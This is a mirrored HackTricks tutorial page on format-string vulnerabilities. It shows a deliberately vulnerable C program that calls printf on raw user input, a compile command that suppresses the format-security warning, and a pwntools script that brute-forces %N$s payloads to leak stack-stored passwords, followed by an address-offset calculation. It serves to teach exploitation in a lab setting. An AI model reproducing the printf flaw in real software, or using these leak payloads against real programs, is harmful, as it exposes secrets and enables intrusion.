Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
CPol fb82ef7e95
GITBOOK-4315: No subject
2024-04-18 17:49:44 +00:00

4.3 KiB
Raw Blame History

Format Strings - Arbitrary Read Example

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Code

#include <stdio.h>
#include <string.h>

char bss_password[20] = "hardcodedPassBSS"; // Password in BSS

int main() {
    char stack_password[20] = "secretStackPass"; // Password in stack
    char input1[20], input2[20];

    printf("Enter first password: ");
    scanf("%19s", input1);
    
    printf("Enter second password: ");
    scanf("%19s", input2);

    // Vulnerable printf
    printf(input1);
    printf("\n");
    
    // Check both passwords
    if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
        printf("Access Granted.\n");
    } else {
        printf("Access Denied.\n");
    }

    return 0;
}

Compile it with:

clang -o fs-read fs-read.c -Wno-format-security

Read from stack

The stack_password will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack:

from pwn import *

for i in range(100):
    print(f"Try: {i}")
    payload = f"%{i}$s\na".encode()
    p = process("./fs-read")
    p.sendline(payload)
    output = p.clean()
    print(output)
    p.close()

In the image it's possible to see that we can leak the password from the stack in the 10th position:

Running the same exploit but with %p instead of %s it's possible to leak a heap address from the stack at %5$p:

The difference between the leaked address and the address of the password is:

> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
$1 = 0x126a
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: